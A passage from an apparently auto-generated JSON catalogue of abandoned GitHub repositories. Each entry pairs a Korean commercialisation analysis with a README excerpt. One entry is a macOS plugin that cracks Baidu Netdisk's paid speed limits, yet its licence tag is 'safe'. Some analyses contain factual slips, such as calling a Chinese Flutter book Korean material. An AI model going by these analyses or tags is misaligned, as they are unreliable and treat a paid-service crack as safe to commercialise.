license](https://img.shields.io/github/license/CodeTips/BaiduNetdiskPlugin-macOS.svg)](https://github.com/CodeTips/BaiduNetdiskPlugin-macOS/blob/master/LICENSE)\n\n![baidubetdiskplugin](./Other/Screenshots/baidubetdiskplugin.png)\n![baidubetdiskplugin_1](./Other/Screenshots/baidubetdiskplugin_1.png)\n### 说明\n* **20191118更新，去掉自动检查更新功能。由于个人精力和能力有限，此项目不再更新支持新版网盘。如使用，请下载2.2.2版本 [官方下载地址][1]。**\n\n* **连续下载10G数据后，会被限制速度到单文件20kb。所以，这个补丁偶尔用用就行，别一直用。**\n\n* **免责声明：本项目旨在学习macOS 逆向的一点实践，不可使用于商业和个人其他意图。若使用不当，均由个人承担。**\n\n* **本项目只用于学习和交流，有能力的请购买官方VIP服务。**\n\n* **包含功能：本地SVIP图标显示，去除本地下载速度限制（服务端已添加限制单文件200kb左右），去除本地极速下载试用时长限制，倒计时永久显示8秒（服务的token大概3分钟过期。意思就是虽然不倒计时，但是3分钟后速度还是会降下来）。**\n\n* **破解完成后，下载速度还是没有变化，可能是资源热度问题，或者是你已经进入百度网盘黑名单。**\n\n* **此项目不再更新，有问题请Issue中找答案，或者添加我微信（博客关于有二维码），很高兴能帮到你。**\n\n* **不会用的伸手狗请滚粗，别出问题后在这里乱咬人。**\n\n### 安装\n\n1. 懒人安装\n* 打开`应用程序`->`实用工具`->`Terminal(终端)`，执行以下命令即可。(需要git支持)\n`cd ~/Downloads && gi","composite_score":0.5703,"license_safety_tag":"safe"},{"name":"kennethreitz/requests-html","github_url":"https://github.com/kennethreitz/requests-html","stars":9,"language":"Python","license":"MIT","abandonment_months":24,"description":"# requests-html 상품화 분석\n\n## 왜 보물인가\n웹사이트의 정보를 자동으로 수집하고 정리해주는 도구로, 수동으로 하던 데이터 수집 업무를 몇 줄의 명령어로 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 경쟁사 가격 모니터링 플랫폼 - 자동으로 경쟁사 웹사이트에서 가격 정보를 수집해 고객에게 알림\n2. **내부 업","readme_excerpt":"Requests-HTML: HTML Parsing for Humans™\n=======================================\n\n.. image:: https://farm5.staticflickr.com/4695/39152770914_a3ab8af40d_k_d.jpg\n\n.. image:: https://travis-ci.com/psf/requests-html.svg?branch=master\n    :target: https://travis-ci.com/psf/requests-html\n\nThis library intends to make parsing HTML (e.g. scraping the web) as\nsimple and intuitive as possible.\n\nWhen using this library you automatically get:\n\n- **Full JavaScript support**! (Using Chromium, thanks to pyppeteer)\n- *CSS Selectors* (a.k.a jQuery-style, thanks to PyQuery).\n- *XPath Selectors*, for the faint of heart.\n- Mocked user-agent (like a real web browser).\n- Automatic following of redirects.\n- Connection–pooling and cookie persistence.\n- The Requests experience you know and love, with magical parsing abilities.\n- **Async Support**\n\n.. Other nice features include:\n\n    - Markdown export of pages and elements.\n\n\nTutorial & Usage\n================\n\nMake a GET request to 'python.org', using Requests:","composite_score":0.5702,"license_safety_tag":"safe"},{"name":"FilledStacks/flutter-tutorials","github_url":"https://github.com/FilledStacks/flutter-tutorials","stars":5,"language":"Dart","license":"MIT","abandonment_months":38,"description":"# FilledStacks/flutter-tutorials 평가 보고서\n\n## 왜 보물인가\n스마트폰 앱 개발을 배우고 싶은 사람들을 위한 실전 강의 모음으로, 학습자들이 직접 따라 만들면서 배울 수 있는 완성된 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 플랫폼으로 월 구독제 강의 서비스를 운영하여 전세계 앱 개발 학습자","readme_excerpt":"# Flutter tutorials\r\n\r\nThe repo contains the source code for all the written tutorials by Filledstacks.\r\n\r\nAll Tutorials plus additional snippets and shorter posts can be found on the [Official FilledStacks website](https://www.filledstacks.com/). \r\n\r\n## Products\r\n\r\n[Flutter Web Mastery course](https://dane-mackier-s-school.teachable.com/p/master-flutter-on-the-web)\r\n\r\n## \\*\\* Important \\*\\*\r\n\r\nWhen you want to run any of the code first run\r\n\r\n```\r\nflutter create .\r\n```\r\n\r\nIn the repo to generate the platform projects for the tutorials.\r\n\r\n## Tutorials\r\n\r\n**087 - How to Build a Flutter Website in 2023** \\[ [Video](https://youtu.be/yvn6I9hzsJs) \\] \\[ [Source](https://github.com/FilledStacks/academy/tree/tutorials/02-nested-routing-start) \\]  \\[ [Written](https://www.filledstacks.com/post/how-to-build-a-flutter-website-in-2023/) \\] - The updated tutorial for building a Flutter Website\r\n\r\n**086 - Flutter Website Nested Layouts and Custom URL's** \\[ [Video](https://youtu.be/cGdNRnBdWpw) \\]","composite_score":0.5689,"license_safety_tag":"safe"},{"name":"ff522/dm-ticket","github_url":"https://github.com/ff522/dm-ticket","stars":213,"language":"Rust","license":"MIT","abandonment_months":27,"description":"","readme_excerpt":"","composite_score":0.5685,"license_safety_tag":"safe"},{"name":"Morizeyao/GPT2-Chinese","github_url":"https://github.com/Morizeyao/GPT2-Chinese","stars":7,"language":"Python","license":"MIT","abandonment_months":25,"description":"# GPT2-Chinese 저장소 분석\n\n## 왜 보물인가\n중국어에 특화된 AI 언어 모델을 무료로 제공하고 있어, 중국어 텍스트 자동 생성이 필요한 서비스들이 직접 개발 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **중국어 챗봇 SaaS**: 중국 시장 진출 기업들이 고객 지원용 자동응답 서비스로 적용\n2. **콘텐츠 자동 생성 도구**","readme_excerpt":"# GPT2-Chinese\n\n## Description\n\n- Chinese version of GPT2 training code, using BERT tokenizer or BPE tokenizer. It is based on the extremely awesome repository from HuggingFace team [Transformers](https://github.com/huggingface/transformers). Can write poems, news, novels, or train general language models. Support char level, word level and BPE level. Support large training corpus.\n- 中文的GPT2训练代码，使用BERT的Tokenizer或Sentencepiece的BPE model（感谢[kangzhonghua](https://github.com/kangzhonghua)的贡献，实现BPE模式需要略微修改train.py的代码）。可以写诗，新闻，小说，或是训练通用语言模型。支持字为单位或是分词模式或是BPE模式（需要略微修改train.py的代码）。支持大语料训练。\n\n## UPDATE 04.11.2024\n\n- 非常感谢各位对本项目的关注。ChatGPT发布以来本项目也重新引起了一些注意。项目本身是我自学Pytorch的练手项目，我也无意做长期的维护更新。如果大家对大模型LLM感兴趣的话，可以邮件我(ned1991@gmail.com)加群沟通，或是在Issue中进行讨论。\n\n## UPDATE 02.06.2021\n\n- 本项目新增了[通用中文GPT-2预训练模型](https://github.com/Morizeyao/GPT2-Chinese#%E6%A8%A1%E5%9E%8B%E5%88%86%E4%BA%AB)、[通用中文GPT-2预训练小模型](https://github.com/Morizeyao/GPT2-Chinese#%E6%A8%A1%E5%9E%8B%E5%88%86%E4%BA%AB)、[中文歌词GPT-2预训练模型](https://g","composite_score":0.5677,"license_safety_tag":"safe"},{"name":"shadowsocksrr/shadowsocksr","github_url":"https://github.com/shadowsocksrr/shadowsocksr","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":41,"description":"# ShadowSocksR 저장소 분석\n\n## 왜 보물인가\n인터넷 접근 제한을 우회하는 네트워크 기술로, 정보 자유도가 낮은 국가나 지역의 사용자들에게 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프록시 서비스 SaaS**: 개인 사용자에게 안전한 인터넷 접근 서비스를 월 구독 형태로 판매\n2. **기업 원격 접속 도구**: 해외 출장 ","readme_excerpt":"ShadowsocksR\n===========\n\n[![Build Status]][Travis CI]\n\nA fast tunnel proxy that helps you bypass firewalls.\n\nServer\n------\n\n### Install\n\nDebian / Ubuntu:\n\n    apt-get install git\n    git clone https://github.com/shadowsocksr/shadowsocksr.git\n\nCentOS:\n\n    yum install git\n    git clone https://github.com/shadowsocksr/shadowsocksr.git\n\nWindows:\n\n    git clone https://github.com/shadowsocksr/shadowsocksr.git\n\n### Usage for single user on linux platform\n\nIf you clone it into \"~/shadowsocksr\"  \nmove to \"~/shadowsocksr\", then run:\n\n    bash initcfg.sh\n\nmove to \"~/shadowsocksr/shadowsocks\", then run:\n\n    python server.py -p 443 -k password -m aes-128-cfb -O auth_aes128_md5 -o tls1.2_ticket_auth_compatible\n\nCheck all the options via `-h`.\n\nYou can also use a configuration file instead (recommend), move to \"~/shadowsocksr\" and edit the file \"user-config.json\", then move to \"~/shadowsocksr/shadowsocks\" again, just run:\n\n    python server.py\n\nTo run in the background:\n\n    ./logrun.sh\n\nTo stop:","composite_score":0.5674,"license_safety_tag":"safe"},{"name":"flutterchina/flutter-in-action","github_url":"https://github.com/flutterchina/flutter-in-action","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# Flutter 학습 자료 저장소 평가\n\n## 왜 보물인가\n스마트폰 앱을 만드는 기술인 Flutter를 배우고 싶은 중국 개발자들을 위한 한국어 교재 모음으로, 상당한 학습 자료가 축적되어 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 온라인 코딩 학원이 이 자료를 교재로 구매하여 Flutter 강좌 운영\n2. **기업 교육 도구**: ","readme_excerpt":"# 注意\n\n本书第二版草稿已上传，**本 repo 将不再维护**，请大家移步：https://github.com/flutterchina/flutter_in_action_2nd\n\n---\n\n# 第一版简介\n\n本项目为Flutter中文网《Flutter实战》开源电子书项目，官网地址为：https://book.flutterchina.club 。\n\n本书随书源码：https://github.com/wendux/flutter_in_action_source_code\n\n\n## 实体书\n<div style=\"text-align:center; padding-bottom:30px\"><a href=\"https://item.jd.com/12816296.html\" title='点击购买'><img height=\"250\" style=\"box-shadow: #aaa 5px 5px 10px;\" src=\"https://pcdn.flutterchina.club/imgs/book.png\"/></a>  <br/> <a class=\"buy-btn\" href=\"https://item.jd.com/12816296.html\" title='点击购买'> 购买实体书 </a></div>\n\n\n## 贡献须知\n\n本书目前仍在创作中，如果您想参与到本书创作，欢迎提PR。本书目录结构如下：\n\n| 目录及文件      | 说明                                                         |\n| --------------- | ------------------------------------------------------------ |\n| src             | 文档目录，您应该在此目录下对应的章节文件夹下修改/创建Markdown文档 |\n| docs            | 打包后的网站代码目录，您不应该手动修改此目录下的文档         |\n| src/SUMMARY.md | 本书目录，要修改目录请参考本文档中前面章节。                 |\n| src/imgs       | 本书所引的图片、截图目录        ","composite_score":0.5667,"license_safety_tag":"unknown"},{"name":"warmheartli/ChatBotCourse","github_url":"https://github.com/warmheartli/ChatBotCourse","stars":9,"language":"Python","license":"MIT","abandonment_months":47,"description":"# ChatBotCourse 저장소 분석\n\n## 왜 보물인가\n챗봇을 만드는 방법을 배울 수 있는 교육 자료로, 누구나 대화형 AI를 직접 만들어볼 수 있다는 점이 가치있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 온라인 쇼핑몰이 고객 상담용 챗봇을 자체 개발하여 운영하는 경우\n2. **내부 업무 도구**: 대기업 HR팀이 직원 급","readme_excerpt":"ChatBotCourse\n==============\n_读本人更多原创文章，欢迎关注微信订阅号_\n\n<img src=\"https://github.com/lcdevelop/MachineLearningCourse/blob/master/weixinpub.jpg\" width = \"150\" height = \"150\" alt=\"lcsays\" />\n\n_欢迎关注我的另外几个github项目_\n * [_大数据专家养成记_](https://github.com/lcdevelop/bigdatablog)\n * [_教你成为全栈工程师_](https://github.com/lcdevelop/FullStackDeveloperCourse)\n * [_机器学习精简入门教程_](https://github.com/lcdevelop/MachineLearningCourse)\n\n智能游戏AI从基础到实战教程\n==============\n * [智能游戏AI从基础到实战教程 一-发动集体智慧开发游戏AI](https://blog.codemeteors.com/tutorial/139)(2018-08-16)\n\n自己动手做聊天机器人教程\n==============\n * [自己动手做聊天机器人 一-涉及知识](https://blog.codemeteors.com/tutorial/63)(2016-06-09)\n * [自己动手做聊天机器人 二-初识NLTK库](https://blog.codemeteors.com/tutorial/64)(2016-06-10)\n * [自己动手做聊天机器人 三-语料与词汇资源](https://blog.codemeteors.com/tutorial/65)(2016-06-12)\n * [自己动手做聊天机器人 四-何须动手？完全自动化对语料做词性标注](https://blog.codemeteors.com/tutorial/67)(2016-06-17)\n * [自己动手做聊天机器人 五-自然语言处理中的文本分类](https://blog.codemeteors.com/tutorial/69)(2016-06-21)\n * [自己动手做聊天机器人 六-教你怎么从一句话里提取出十","composite_score":0.5663,"license_safety_tag":"safe"},{"name":"apidoc/apidoc","github_url":"https://github.com/apidoc/apidoc","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":28,"description":"# apidoc/apidoc 저장소 분석\n\n## 왜 보물인가\nAPI(프로그램 간 통신 규약)를 사용하는 기업들이 쉽게 문서화할 수 있도록 도와주는 자동화 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 회사가 고객사에 제공하는 API 사용 설명서를 자동으로 생성하여 고객 온보딩 시간 단축\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# Important note\n\nThis project is currently not active maintained!\nSee discussion https://github.com/apidoc/apidoc/issues/1436\n\n# apiDoc\n\napiDoc creates a documentation from API descriptions in your source code.\n\n![validate](https://github.com/apidoc/apidoc/workflows/validate/badge.svg)\n[![NPM version](https://badge.fury.io/js/apidoc.svg)](http://badge.fury.io/js/apidoc)\n[![Join the chat at https://gitter.im/apidoc/talk](https://badges.gitter.im/apidoc/talk.svg)](https://gitter.im/apidoc/talk?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n### Documentation: [apidocjs.com](http://apidocjs.com)\n\n### [Live DEMO](http://apidocjs.com/example/)\n\n## Installation\n\n```bash\n$ npm install -g apidoc\n```\n\n## Usage\n\nAdd some apidoc comments anywhere in your source code:\n\n```java\n/**\n * @api {get} /user/:id Request User information\n * @apiName GetUser\n * @apiGroup User\n *\n * @apiParam {Number} id User's unique ID.\n *\n * @apiSuccess {String} firstname Firstname of the User","composite_score":0.5656,"license_safety_tag":"unknown"},{"name":"ustbhuangyi/vue-analysis","github_url":"https://github.com/ustbhuangyi/vue-analysis","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":35,"description":"# Vue 분석 저장소 평가\n\n## 왜 보물인가\nVue.js라는 인기 있는 웹 개발 도구의 내부 동작 원리를 상세히 설명해주는 교육 자료로, 웹 개발자들의 실력 향상에 직접적으로 기여할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **웹 개발 교육 플랫폼**: Vue.js를 배우는 수강생들을 위한 심화 학습 콘텐츠로 유료 강좌 판매\n- **기업 개발팀 온보","readme_excerpt":"# Vue.js 技术揭秘\n\n[电子书](https://ustbhuangyi.github.io/vue-analysis/)\n\n目前社区有很多 Vue.js 的源码解析文章，但是质量层次不齐，不够系统和全面，这本电子书的目标是全方位细致深度解析 Vue.js 的实现原理，让同学们可以彻底掌握 Vue.js。目前分析的版本是 Vue.js 的最新版本 Vue.js 2.5.17-beta.0，并且之后会随着版本升级而做相应的更新，充分发挥电子书的优势。\n\n这本电子书是作为 [《Vue.js 源码揭秘》](http://coding.imooc.com/class/228.html)视频课程的辅助教材。电子书是开源的，同学们可以免费阅读，视频是收费的，25+小时纯干货课程，如果有需要的同学可以购买来学习，**但请务必支持正版，请尊重作者的劳动成果**。\n\n## 章节目录\n\n为了把 Vue.js 的源码讲明白，课程设计成由浅入深，分为核心、编译、扩展、生态四个方面去讲，并拆成了八个章节，如下图：\n\n<img src=\"https://ustbhuangyi.github.io/vue-analysis/assets/mind.png\">\n\n**第一章：准备工作**\n\n介绍了 Flow、Vue.js 的源码目录设计、Vue.js 的源码构建方式，以及从入口开始分析了 Vue.js 的初始化过程。\n\n**第二章：数据驱动**\n\n详细讲解了模板数据到 DOM 渲染的过程，从 `new Vue` 开始，分析了 `mount`、`render`、`update`、`patch` 等流程。\n\n**第三章：组件化**\n\n分析了组件化的实现原理，并且分析了组件周边的原理实现，包括合并配置、生命周期、组件注册、异步组件。\n\n**第四章：深入响应式原理**\n\n详细讲解了数据的变化如何驱动视图的变化，分析了响应式对象的创建，依赖收集、派发更新的实现过程，一些特殊情况的处理，并对比了计算属性和侦听属性的实现，最后分析了组件更新的过程。\n\n**第五章：编译**\n\n从编译的入口函数开始，分析了编译的三个核心流程的实现：`parse` -> `optimize` -> `codegen`。\n\n**第六章：扩展**\n\n详细讲解了 `event`、`v-model`、`slot`、`keep-ali","composite_score":0.5652,"license_safety_tag":"safe"},{"name":"contiamo/restful-react","github_url":"https://github.com/contiamo/restful-react","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":40,"description":"","readme_excerpt":"# `restful-react`\n\n[![npm](https://img.shields.io/npm/v/restful-react.svg)](https://www.npmjs.com/package/restful-react)\n\n⚠️ **restful-react has been deprecated:** We are focusing on a new open api generator that generates `react-query` components: https://github.com/fabien0102/openapi-codegen ⚠️\n\nBuilding React apps that interact with a RESTful API presents a set of questions, challenges and potential gotchas. This project aims to remove such pitfalls, and provide a pleasant developer experience when crafting such applications.\n\nIt can be considered **a thin wrapper around the [fetch API](https://developer.mozilla.org/en/docs/Web/API/Fetch_API) in the form of React components and hooks.**\n\nWhen used in a setup with [OpenAPI / Swagger](https://en.wikipedia.org/wiki/OpenAPI_Specification) specs and [Typescript](https://www.typescriptlang.org/), **restful-react ensures a reliable and always up to date contract between backend and frontend.** It generates components and types from your sp","composite_score":0.5645,"license_safety_tag":"safe"},{"name":"ecomfe/spec","github_url":"https://github.com/ecomfe/spec","stars":5,"language":"","license":"unknown","abandonment_months":42,"description":"# ecomfe/spec 자산 분석\n\n## 왜 보물인가\n전자상거래 업계의 기술 표준과 규칙을 문서화해 놓은 것으로, 온라인 쇼핑 시스템을 만드는 회사들이 공통으로 참고할 수 있는 설계도 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 플랫폼 구축 SaaS**\n- 중소 쇼핑몰 창업자들을 위한 월구독 플랫폼으로, 이 스펙을 기반으로 표준화된 기","readme_excerpt":"This repository contains the specifications.\n\n\n- [JavaScript编码规范](javascript-style-guide.md) <span class=\"std-rec\">[1.3]</span>\n- [JavaScript编码规范 - ESNext补充篇](es-next-style-guide.md) <span class=\"std-rec\">[draft]</span>\n- [HTML编码规范](html-style-guide.md) <span class=\"std-rec\">[1.2]</span>\n- [CSS编码规范](css-style-guide.md) <span class=\"std-rec\">[1.2]</span>\n- [Less编码规范](less-code-style.md) <span class=\"std-rec\">[1.1]</span>\n- [E-JSON数据传输标准](e-json.md) <span class=\"std-rec\">[1.0]</span>\n- [模块和加载器规范](module.md) <span class=\"std-rec\">[1.1]</span>\n- [包结构规范](package.md) <span class=\"std-rec\">[1.1]</span>\n- [项目目录结构规范](directory.md) <span class=\"std-rec\">[1.1]</span>\n- [图表库标准](chart.md) <span class=\"std-rec\">[1.0]</span>\n- [react编码规范](react-style-guide.md) <span class=\"std-rec\">[draft]</span>\n\n\nLint and fix tool：[FECS](http://fecs.baidu.com/)\n","composite_score":0.5639,"license_safety_tag":"unknown"},{"name":"tensorlayer/tensorlayer","github_url":"https://github.com/tensorlayer/tensorlayer","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":40,"description":"# TensorLayer 저장소 분석\n\n## 왜 보물인가\n인공지능 모델을 쉽게 만들고 학습시킬 수 있는 오픈소스 도구로, 복잡한 AI 개발을 누구나 접근 가능하게 만듭니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼 SaaS**: 학생과 직장인이 웹에서 바로 AI 모델을 만들고 실습하는 온라인 강의 서비스\n2. **기업용 자동화 도구**: 영상 ","readme_excerpt":"<a href=\"https://tensorlayer.readthedocs.io/\">\n    <div align=\"center\">\n        <img src=\"img/tl_transparent_logo.png\" width=\"50%\" height=\"30%\"/>\n    </div>\n</a>\n\n<!--- [![PyPI Version](https://badge.fury.io/py/tensorlayer.svg)](https://badge.fury.io/py/tensorlayer) --->\n<!--- ![PyPI - Python Version](https://img.shields.io/pypi/pyversions/tensorlayer.svg)) --->\n\n![GitHub last commit (branch)](https://img.shields.io/github/last-commit/tensorlayer/tensorlayer/master.svg)\n[![Supported TF Version](https://img.shields.io/badge/TensorFlow-2.0.0%2B-brightgreen.svg)](https://github.com/tensorflow/tensorflow/releases)\n[![Documentation Status](https://readthedocs.org/projects/tensorlayer/badge/)](https://tensorlayer.readthedocs.io/)\n[![Build Status](https://travis-ci.org/tensorlayer/tensorlayer.svg?branch=master)](https://travis-ci.org/tensorlayer/tensorlayer)\n[![Downloads](http://pepy.tech/badge/tensorlayer)](http://pepy.tech/project/tensorlayer)\n[![Downloads](https://pepy.tech/badge/tensorlay","composite_score":0.5637,"license_safety_tag":"unknown"},{"name":"nosir/cleave.js","github_url":"https://github.com/nosir/cleave.js","stars":18,"language":"JavaScript","license":"apache-2.0","abandonment_months":30,"description":"# nosir/cleave.js 분석 보고서\n\n## 왜 보물인가\n입력 양식을 자동으로 정렬하고 검증하는 작은 도구로, 사용자가 전화번호나 신용카드 번호를 입력할 때 자동으로 하이픈이나 띄어쓰기를 넣어주는 방식입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융 서비스 SaaS**\n- 온라인 결제, 대출 신청, 계좌 개설 등 금융 플랫폼에서 고객 입력 데이터를","readme_excerpt":"# ⚠️ Deprecated Message\n\n**Message:** Kindly note that this library has been deprecated. If you are still interested in using Cleave, please explore the new version available at: [cleave-zen](https://github.com/nosir/cleave-zen).\n\nAnd this is the message from author: https://github.com/nosir/cleave.js/issues/723\n\n# Cleave.js\n\n[![Travis](https://img.shields.io/travis/nosir/cleave.js.svg?maxAge=2592000)](https://travis-ci.org/nosir/cleave.js)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/b1c0b0da42fa418f887076a3f7352aea)](https://www.codacy.com/app/nosir/cleave-js?utm_source=github.com&utm_medium=referral&utm_content=nosir/cleave.js&utm_campaign=badger)\n[![npm version](https://badge.fury.io/js/cleave.js.svg)](https://badge.fury.io/js/cleave.js)\n[![npm downloads](https://img.shields.io/npm/dm/cleave.js.svg)](https://www.npmjs.com/package/cleave.js)\n[![Documents](https://img.shields.io/badge/documents-check-3362c2.svg)](https://github.com/nosir/cleave.js/blob/master/doc/doc.m","composite_score":0.5636,"license_safety_tag":"safe"},{"name":"MrS0m30n3/youtube-dl-gui","github_url":"https://github.com/MrS0m30n3/youtube-dl-gui","stars":5,"language":"Python","license":"unlicense","abandonment_months":42,"description":"# youtube-dl-gui 상업화 분석\n\n## 왜 보물인가\n유튜브 영상을 간편하게 다운로드할 수 있는 사용자 친화적인 도구로, 기술 지식 없는 일반인도 쉽게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 기반 온라인 영상 다운로드 웹 서비스 (가입 후 바로 사용)\n2. **내부 업무 도구**: 기업 교육팀이 유튜","readme_excerpt":"[![Donations Badge](https://yourdonation.rocks/images/badge.svg)](https://mrs0m30n3.github.io/youtube-dl-gui/donate.html)\n\n# youtube-dlG\nA cross platform front-end GUI of the popular [youtube-dl](https://rg3.github.io/youtube-dl/) media downloader written in wxPython. [Supported sites](https://rg3.github.io/youtube-dl/supportedsites.html)\n\n## Screenshots\n![youtube-dl-gui main window](https://raw.githubusercontent.com/MrS0m30n3/youtube-dl-gui/gh-pages/images/ydlg_ui.gif)\n\n## Requirements\n* [Python 2.7.3+](https://www.python.org/downloads)\n* [wxPython 3](https://wxpython.org/download.php)\n* [TwoDict](https://pypi.python.org/pypi/twodict)\n* [GNU gettext](https://www.gnu.org/software/gettext/) (to build the package)\n* [FFmpeg](https://ffmpeg.org/download.html) (optional, to post process video files)\n\n## Downloads\n* [Source (.zip)](https://github.com/MrS0m30n3/youtube-dl-gui/archive/0.4.zip)\n* [Source (.tar.gz)](https://github.com/MrS0m30n3/youtube-dl-gui/archive/0.4.tar.gz)\n* [PyPi](https:","composite_score":0.5636,"license_safety_tag":"unknown"},{"name":"tuandm/laravue","github_url":"https://github.com/tuandm/laravue","stars":10,"language":"Vue","license":"MIT","abandonment_months":38,"description":"","readme_excerpt":"<p align=\"center\">\n  <img width=\"320\" src=\"https://cp5.sgp1.cdn.digitaloceanspaces.com/zoro/laravue-cdn/laravue-logo-line.png\">\n</p>\n<p align=\"center\">\n  <a href=\"https://laravel.com\">\n    <img src=\"https://img.shields.io/badge/laravel-7.3-brightgreen.svg\" alt=\"vue\">\n  </a>\n  <a href=\"https://github.com/vuejs/vue\">\n    <img src=\"https://img.shields.io/badge/vue-2.6.10-brightgreen.svg\" alt=\"vue\">\n  </a>\n  <a href=\"https://github.com/ElemeFE/element\">\n    <img src=\"https://img.shields.io/badge/element--ui-2.13.0-brightgreen.svg\" alt=\"element-ui\">\n  </a>\n  <a href=\"https://github.com/tuandm/laravue/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/badge/license-MIT-brightgreen.svg\" alt=\"license\">\n  </a>\n</p>\n\n# Laravue\n[Laravue](https://laravue.dev) (pronounced /ˈlarəvjuː/) is a beautiful dashboard combination of [Laravel](https://laravel.com/), [Vue.js](https://github.com/vuejs/vue) and the UI Toolkit [Element](https://github.com/ElemeFE/element). The work is inspired by  [vue-e","composite_score":0.5631,"license_safety_tag":"safe"},{"name":"x-hw/amazing-qr","github_url":"https://github.com/x-hw/amazing-qr","stars":9,"language":"Python","license":"GPL-3.0","abandonment_months":30,"description":"# Amazing QR 사업화 분석\n\n## 왜 보물인가\nQR코드를 더 예쁘고 개성있게 만들 수 있는 기술로, 마케팅이나 명함 제작에 필요한 핵심 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 온라인 QR코드 생성 플랫폼**\n- 사용자가 웹사이트에서 로그인 후 맞춤형 QR코드를 만들고 다운로드하도록 운영\n\n**2. 내부 업무 도구","readme_excerpt":"# Amazing-QR\n\n[![former name](https://img.shields.io/badge/old%20name-MyQR-yellow)](https://pypi.org/project/myqr/) [![PyPI - Downloads](https://img.shields.io/pypi/dm/myqr?label=downloads@myqr)](https://pypi.org/project/myqr/) [![](https://img.shields.io/badge/language-Python-blue)](https://www.python.org/) ![PyPI - Python Version](https://img.shields.io/pypi/pyversions/amzqr?logo=python&logoColor=ffffff&label=Python&labelColor=blue&color=ffffff) [![PyPI](https://img.shields.io/pypi/v/amzqr?logo=pypi&logoColor=ffffff&label=PyPI&labelColor=blue)](https://pypi.org/project/amzqr/) ![PyPI - Wheel](https://img.shields.io/pypi/wheel/amzqr) [![PyPI - Downloads](https://img.shields.io/pypi/dm/amzqr)](https://pypi.org/project/amzqr/) [![PyPI - License](https://img.shields.io/pypi/l/amzqr)](https://github.com/x-hw/amazing-qr/blob/master/LICENSE.md) ![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/x-hw/amazing-qr) ![macos](https://img.shields.io/badge/-macOS-black?l","composite_score":0.5631,"license_safety_tag":"restricted"},{"name":"GoogleChrome/web.dev","github_url":"https://github.com/GoogleChrome/web.dev","stars":5,"language":"Nunjucks","license":"NOASSERTION","abandonment_months":27,"description":"# GoogleChrome/web.dev 저장소 분석\n\n## 왜 보물인가\n구글이 직접 관리하는 웹 개발 학습 플랫폼으로, 최신 웹 기술과 성능 최적화 가이드를 무료로 제공하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 SaaS**: 초급 개발자를 위한 구조화된 온라인 강좌 플랫폼으로 패키징\n2. **기업 내부 도구**: IT팀이 직원의 웹 ","readme_excerpt":"# web.dev [Archived]\n\n**Note:** This site is migrated to a new platform and this repository is available in a read-only mode. **We will not be merging new pull requests**. Please raise content issues in the new [issue tracker](https://issuetracker.google.com/issues/new?component=1400680&pli=1&template=1857359).\n\nweb.dev is the ultimate resource for developers of all backgrounds to learn,\ncreate, and solve on the web. It's meant to not only educate developers, but\nhelp them apply what they've learned to any site they work on, be it personal or\nbusiness.\n\n-----\n# [Archived README]\n\n## Building the site 🏗\n\nYou'll need a recent version of [Node](https://nodejs.org/): v14 (LTS) or higher.\nTo check your node version run `node -v` in your terminal.\n\nIf you don't have node, or if you need to upgrade, we recommend using the [Node\nVersion Manager (nvm)](https://github.com/nvm-sh/nvm).\n\n### Clone the repo\n\n```bash\ngit clone https://github.com/GoogleChrome/web.dev.git\n```\n\n### Change directory int","composite_score":0.5621,"license_safety_tag":"unknown"},{"name":"shwenzhang/AndResGuard","github_url":"https://github.com/shwenzhang/AndResGuard","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":32,"description":"# AndResGuard 보물 평가 보고서\n\n## 왜 보물인가\n안드로이드 앱을 압축해서 용량을 줄여주는 도구로, 모바일 앱 개발사들이 배포 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발사 대상 SaaS**: 앱 빌드 시 자동으로 리소스를 최적화해주는 클라우드 서비스\n2. **게임사 내부 도구**: 대용량 게임 앱의 설","readme_excerpt":"# AndResGuard\n\n[![Build Status](https://travis-ci.org/shwenzhang/AndResGuard.svg?branch=master)](https://travis-ci.org/shwenzhang/AndResGuard)\n[ ![Download](https://api.bintray.com/packages/wemobiledev/maven/com.tencent.mm%3AAndResGuard-core/images/download.svg) ](https://bintray.com/wemobiledev/maven/com.tencent.mm%3AAndResGuard-core/_latestVersion)\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-AndResGuard-green.svg?style=true)](https://android-arsenal.com/details/1/3034)\n\n*Read this in other languages: [English](README.md), [简体中文](README.zh-cn.md).*\n\n`AndResGuard` is a tooling for reducing your apk size, it works like the `ProGuard` for Java source code, but only aim at the resource files. It changes `res/drawable/wechat` to `r/d/a`, and renames the resource file `wechat.png` to `a.png`. Finally, it repackages the apk with 7zip, which can reduce the package size obviously.\n\n`AndResGuard` is fast, and it does **NOT** need the source codes. Input an Android apk, th","composite_score":0.5619,"license_safety_tag":"safe"},{"name":"lukemelas/EfficientNet-PyTorch","github_url":"https://github.com/lukemelas/EfficientNet-PyTorch","stars":11,"language":"Python","license":"Apache-2.0","abandonment_months":50,"description":"# 